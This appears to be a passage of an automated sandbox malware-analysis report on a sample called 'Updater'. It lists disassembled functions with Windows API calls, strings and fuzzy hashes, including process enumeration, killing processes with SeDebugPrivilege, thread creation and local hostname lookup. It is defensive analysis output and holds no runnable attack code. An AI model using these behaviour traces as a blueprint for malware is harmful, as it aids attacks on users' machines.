Similarity

API ID: Message$PostSleepThreadVirtual$AttachCurrentInputProcessSendTimeoutWindow
String ID:
API String ID: 2686503918-0
Opcode ID: 00721bf8a20d7636e45e28de5ee183045003d7be5434c6d7512eed67faf0af2b
Instruction ID: 6c0959c34b7bced40f1f39d29c3a8caaf6af154be774e51fa500a18091eb0368
Opcode Fuzzy Hash: 00721bf8a20d7636e45e28de5ee183045003d7be5434c6d7512eed67faf0af2b
Instruction Fuzzy Hash: 2C01B170794210BBFB106B689C8AF597B99DB4DF52F100011F318AF1E0DDE62844CA69

Function 00B8291D Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00B82557,?,?,00000000), ref: 00B82926
HeapAlloc.KERNEL32(00000000,?,00B82557,?,?,00000000), ref: 00B8292D
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B82557,?,?,00000000), ref: 00B82942
GetCurrentProcess.KERNEL32(?,00000000,?,00B82557,?,?,00000000), ref: 00B8294A
DuplicateHandle.KERNEL32(00000000,?,00B82557,?,?,00000000), ref: 00B8294D
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B82557,?,?,00000000), ref: 00B8295D
GetCurrentProcess.KERNEL32(00B82557,00000000,?,00B82557,?,?,00000000), ref: 00B82965
DuplicateHandle.KERNEL32(00000000,?,00B82557,?,?,00000000), ref: 00B82968
CreateThread.KERNEL32(00000000,00000000,00B8298E,00000000,00000000,00000000), ref: 00B82982

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 96997bbc46478f894d2661b2c5656db26a77b743e1623f2c1bf4d193082084e9
Instruction ID: bdea008155248ce68bcc225d48d55b46bc67cb22a306f2194deb2507a067a203
Opcode Fuzzy Hash: 96997bbc46478f894d2661b2c5656db26a77b743e1623f2c1bf4d193082084e9
Instruction Fuzzy Hash: 6E01CDB5240308BFE710AFA9DC4DF6B7BACEB88711F444511FA05EB1A1DAB4D800CB21

Function 00BAAAD8 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00B8E2AB: CreateToolhelp32Snapshot.KERNEL32 ref: 00B8E2D0
Part of subcall function 00B8E2AB: Process32FirstW.KERNEL32(00000000,?), ref: 00B8E2DE
Part of subcall function 00B8E2AB: CloseHandle.KERNEL32(00000000), ref: 00B8E3BC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BAAB63
GetLastError.KERNEL32 ref: 00BAAB76
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BAABA9
TerminateProcess.KERNEL32(00000000,00000000), ref: 00BAAC5E
GetLastError.KERNEL32(00000000), ref: 00BAAC69
CloseHandle.KERNEL32(00000000), ref: 00BAACBA

Strings

SeDebugPrivilege, xrefs: 00BAAB85

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 23c93f2e8743cfce1c90fe47744d763a63c0d92c957ab65cc1b4ec282f96a292
Instruction ID: c32d0108fbc912c5c0256035ad9030977219bf187c8980a2b2eccdebe2eaf80c
Opcode Fuzzy Hash: 23c93f2e8743cfce1c90fe47744d763a63c0d92c957ab65cc1b4ec282f96a292
Instruction Fuzzy Hash: 2D619E30208202AFD720DF15C994F26BBE1EF45318F5484DCE45A8B7A2DBB5ED45CBA2

Function 00BB421E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00BB42BD
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00BB42D2
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00BB42EC
_wcslen.LIBCMT ref: 00BB4331
SendMessageW.USER32(?,00001057,00000000,?), ref: 00BB435E
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00BB438C

Strings

SysListView32, xrefs: 00BB428F

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 2fd2564ff84287958e0282e3f293e7a7d34b9586f62e5fdb2fa42af949470f1e
Instruction ID: 7c1695cb9abd8fe30ea6860257743a4747cdcbacad0240e05a28967dd9fcb4fe
Opcode Fuzzy Hash: 2fd2564ff84287958e0282e3f293e7a7d34b9586f62e5fdb2fa42af949470f1e
Instruction Fuzzy Hash: FA41AF71A10218ABDF219F64CC45BFA7BE9FF08350F1101A6F958E7292E7B19D54CB90

Function 00B8CAE1 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B8CB80
IsMenu.USER32(00000000), ref: 00B8CBA0
CreatePopupMenu.USER32 ref: 00B8CBD6
GetMenuItemCount.USER32(00000000), ref: 00B8CC34
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00B8CC5C

Strings

2, xrefs: 00B8CBBA
0, xrefs: 00B8CB2B

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 9b19f2be0cd8fedb720f899f317cfb808bf1ae229b2b480eedc66bf1f0b090a9
Instruction ID: 8996ae8dacf9c393995093abf95609fde06b7c4fda560b9f44719e172ad68262
Opcode Fuzzy Hash: 9b19f2be0cd8fedb720f899f317cfb808bf1ae229b2b480eedc66bf1f0b090a9
Instruction Fuzzy Hash: DE518FB0600209DBDF20EF68D984BAEBFF4EF49314F244299E419D72A1E7709940CBB1

Function 00B8D612 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00B8D6B1

Strings

blank, xrefs: 00B8D633
stop, xrefs: 00B8D682
question, xrefs: 00B8D66A
info, xrefs: 00B8D652
warning, xrefs: 00B8D69A

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: adc68ae090ff49f7e31fffad38e86756cb5f6b52a51393c4dff3896c00f51a9c
Instruction ID: 859015616297c23a7968224d043ec6d189619167bf0698b05638943f6db4195d
Opcode Fuzzy Hash: adc68ae090ff49f7e31fffad38e86756cb5f6b52a51393c4dff3896c00f51a9c
Instruction Fuzzy Hash: 3911C63264830A7FD7156A559C82D6A67D8EF16364B2000EBF908A61D1FFB16A40A3A8

Function 00B8EC7C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00B8EC97
gethostname.WSOCK32(?,00000100), ref: 00B8ECB1
gethostbyname.WSOCK32(?), ref: 00B8ECBE
inet_ntoa.WSOCK32(?), ref: 00B8ED00
_strcat.LIBCMT ref: 00B8ED0E
WSACleanup.WSOCK32 ref: 00B8ED33

Strings

0.0.0.0, xrefs: 00B8ECDC

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: e1e15110be90c71524d184a11c2ee6e472f3d4edb236451c660bd4c0450da17f
Instruction ID: 8ea69fac58188b9351ac06ab71be20c765422af5032c458678c5aae953b13ef3
Opcode Fuzzy Hash: e1e15110be90c71524d184a11c2ee6e472f3d4edb236451c660bd4c0450da17f
Instruction Fuzzy Hash: 8A11C031904114ABDB20BB659C4AAEA37ECEB55711F0005F9F518970A1FFB4CA859B60

Function 00BBA94E Relevance: 12.3, APIs: 8, Instructions: 262windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B34E5A: GetWindowLongW.USER32(00000000,000000EB), ref: 00B34E6B

GetSystemMetrics.USER32(0000000F), ref: 00BBA98F
GetSystemMetrics.USER32(0000000F), ref: 00BBA9AF
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00BBABF3
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00BBAC11
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00BBAC32
ShowWindow.USER32(00000003,00000000), ref: 00BBAC51
InvalidateRect.USER32(?,00000000,00000001), ref: 00BBAC76
DefDlgProcW.USER32(?,00000005,?,?), ref: 00BBAC99

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 61d90ee0b124f3a26737522428d87599a098f6d552acad58ec264e8eb1266289
Instruction ID: 3ffd01445b6bec1b23cbf9d1b3e262d248f3879e4b371a33a82ec33013146a11
Opcode Fuzzy Hash: 61d90ee0b124f3a26737522428d87599a098f6d552acad58ec264e8eb1266289
Instruction Fuzzy Hash: 6EB16A31A002199FDF14CF68C9857FE7BF2FB44701F1980A9EC599B295EAB4A940CB51

Function 00B3544C Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000024,000000FF,00000000,?,?,00B78E87,00000004,00000000,00000000), ref: 00B354CC
ShowWindow.USER32(00000024,00000006,00000000,?,?,00B78E87,00000004,00000000,00000000), ref: 00B78EE3
ShowWindow.USER32(00000024,000000FF,00000000,?,?,00B78E87,00000004,00000000,00000000), ref: 00B78F66

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: b273031df8df937fe85387c5da22aea77222b036b29ad386e901181a80be0ae0
Instruction ID: 8a4db6dd3af672fb22aa3f0a377813f7e62df8f6380d465c99226925f1c810da
Opcode Fuzzy Hash: b273031df8df937fe85387c5da22aea77222b036b29ad386e901181a80be0ae0
Instruction Fuzzy Hash: C741B630604A809BCB3D9B2DD8CCB7A7BD2EB95312F348599E05B47A65DA75A9C0C720

Function 00BB3681 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00BB3699
GetDC.USER32(00000000), ref: 00BB36A1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BB36AC
ReleaseDC.USER32(00000000,00000000), ref: 00BB36B8
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00BB36F4
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BB3705
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00BB64C1,?,?,000000FF,00000000,?,000000FF,?), ref: 00BB3740
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00BB375F

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: b1c8e9341ff88c0a9c2c7b0e895651bd7dceb200e5738521310ca43b976ebc96
Instruction ID: 631b4bdaf25f302d3d473bcbac73ef62f1a0ad2ed2e8fff26ace7975a7f009e3
Opcode Fuzzy Hash: b1c8e9341ff88c0a9c2c7b0e895651bd7dceb200e5738521310ca43b976ebc96
Instruction Fuzzy Hash: 79318DB22012107FEB114F15CC89FEB3BADEF09B21F044155FE099B291EAB99C41CB64

Function 00B61452 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 00B614FE
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00B61581
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B61614
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00B6162B

Part of subcall function 00B5282E: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00B40445,?,?,00B2FA72,00000000,?,?,?,00B21188,?), ref: 00B52860

MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B616A7
__freea.LIBCMT ref: 00B616D2
__freea.LIBCMT ref: 00B616DE

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: f55160d9a051223321eeb6604f87d39a75f589cdf38810ce29c754545350992c
Instruction ID: 8fec6d9facba7a4e23f1e899c7c6d00cc97ee4c5edd04c15d6bff223d97db146
Opcode Fuzzy Hash: f55160d9a051223321eeb6604f87d39a75f589cdf38810ce29c754545350992c
Instruction Fuzzy Hash: 51919272E012169BDF208E6DC881AEEBBF5DF59350F1C4A99E905E7251DB39DC40CB60

Function 00BA5123 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00BA5248
VariantInit.OLEAUT32(?), ref: 00BA5349
VariantClear.OLEAUT32(?), ref: 00BA5353
VariantClear.OLEAUT32(?), ref: 00BA53B0

Strings

Null Object assignment in FOR..IN loop, xrefs: 00BA51D8, 00BA5306, 00BA53BE
Incorrect Object type in FOR..IN loop, xrefs: 00BA532C

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 3ed87cf43e236fd6858897dae0ac546e38ab9de394f1e584f421bc456dbc599a
Instruction ID: 77ce7b6b1fc764d2c4b8268a5a2867e76cad915f3b172936aecf92332ab939bb
Opcode Fuzzy Hash: 3ed87cf43e236fd6858897dae0ac546e38ab9de394f1e584f421bc456dbc599a
Instruction Fuzzy Hash: 97918471A04719ABDF34CF95D844FAE7BF8EF86710F108599F516AB240D7B09A44CBA0

Function 00BA57AD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00B810AB: CLSIDFromProgID.OLE32(?,?,?,?,?,?,?,-C000001E,00000001,?,00B80FDC,80070057), ref: 00B810C8
Part of subcall function 00B810AB: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00B80FDC,80070057), ref: 00B810E3
Part of subcall function 00B810AB: lstrcmpiW.KERNEL32(?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00B80FDC,80070057), ref: 00B810F1
Part of subcall function 00B810AB: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00B80FDC,80070057), ref: 00B81101

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00BA5851
_wcslen.LIBCMT ref: 00BA5959
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00BA59D1
CoTaskMemFree.OLE32(?), ref: 00BA59DC

Strings

NULL Pointer assignment, xrefs: 00BA5A29, 00BA5A58

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 318e7b73842aa471e5d79f0c2a8eef940fb0a1e918d1f8a90cfdbf791e6c1b7c
Instruction ID: bf5c99f967504beb70e53c3b66cd3b1a247bb1ac0e48da303c55b9bd7329e7a3
Opcode Fuzzy Hash: 318e7b73842aa471e5d79f0c2a8eef940fb0a1e918d1f8a90cfdbf791e6c1b7c
Instruction Fuzzy Hash: 9B91F871D05219DBDF20DFA4D881AEEB7F8FF08310F1045AAE919A7251EB745A45CF60

Function 00BA44DE Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00BA44FE
CharUpperBuffW.USER32(?,?), ref: 00BA460B
_wcslen.LIBCMT ref: 00BA4616
VariantClear.OLEAUT32(?), ref: 00BA4790

Part of subcall function 00B91ABE: VariantInit.OLEAUT32(00000000), ref: 00B91AFE
Part of subcall function 00B91ABE: VariantCopy.OLEAUT32(?,?), ref: 00B91B07
Part of subcall function 00B91ABE: VariantClear.OLEAUT32(?), ref: 00B91B13

Strings

AUTOIT.ERROR, xrefs: 00BA4611, 00BA4622
Incorrect Parameter format, xrefs: 00BA4540, 00BA470C

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 32a4e7ee8cbf2dc47c763d1ef0a6d817f6032333ef18ed5ef6f3cdcaf17b37e0
Instruction ID: 237fe2cfbaae4aee97bc733c430c70ba026aebe787d836774b0d7f123d5cd1f6
Opcode Fuzzy Hash: 32a4e7ee8cbf2dc47c763d1ef0a6d817f6032333ef18ed5ef6f3cdcaf17b37e0
Instruction Fuzzy Hash: 0A81BF71A08311AFCB10DF24C480A6ABBE4FF8A714F0489ACF94A9B351DB71ED05CB91

Function 00BB885A Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01366850), ref: 00BB88F4
IsWindowEnabled.USER32(01366850), ref: 00BB8900
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00BB89E4
SendMessageW.USER32(01366850,000000B0,?,?), ref: 00BB8A1B
IsDlgButtonChecked.USER32(?,?), ref: 00BB8A58
GetWindowLongW.USER32(01366850,000000EC), ref: 00BB8A7A
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00BB8A92

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 054906eec636b8254ff15b953b94a53aac69a964140904b2f6ff6fa54a563926
Instruction ID: a870c7b259cf32a39347f5c877dba8d2c6d30bb63333670e1d538946bd1d9c91
Opcode Fuzzy Hash: 054906eec636b8254ff15b953b94a53aac69a964140904b2f6ff6fa54a563926
Instruction Fuzzy Hash: 34718C38600205AFDF259F64C885FFABBE9FF09300F1441D9E99A972A1DBB1A840DB51

Function 00BB2A1F Relevance: 10.7, APIs: 7, Instructions: 197windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00BB2AA5
GetMenuItemCount.USER32(00000000), ref: 00BB2AD7
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00BB2AFF
_wcslen.LIBCMT ref: 00BB2B35
GetMenuItemID.USER32(?,?), ref: 00BB2B6F
GetSubMenu.USER32(?,?), ref: 00BB2B7D

Part of subcall function 00B83E94: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B83EB2
Part of subcall function 00B83E94: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B83EC3
Part of subcall function 00B83E94: GetCurrentThreadId.KERNEL32 ref: 00B83ECA
Part of subcall function 00B83E94: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,?,?,?,00B8368B), ref: 00B83ED1

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00BB2C05

Part of subcall function 00B8F7F5: Sleep.KERNEL32 ref: 00B8F86D

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
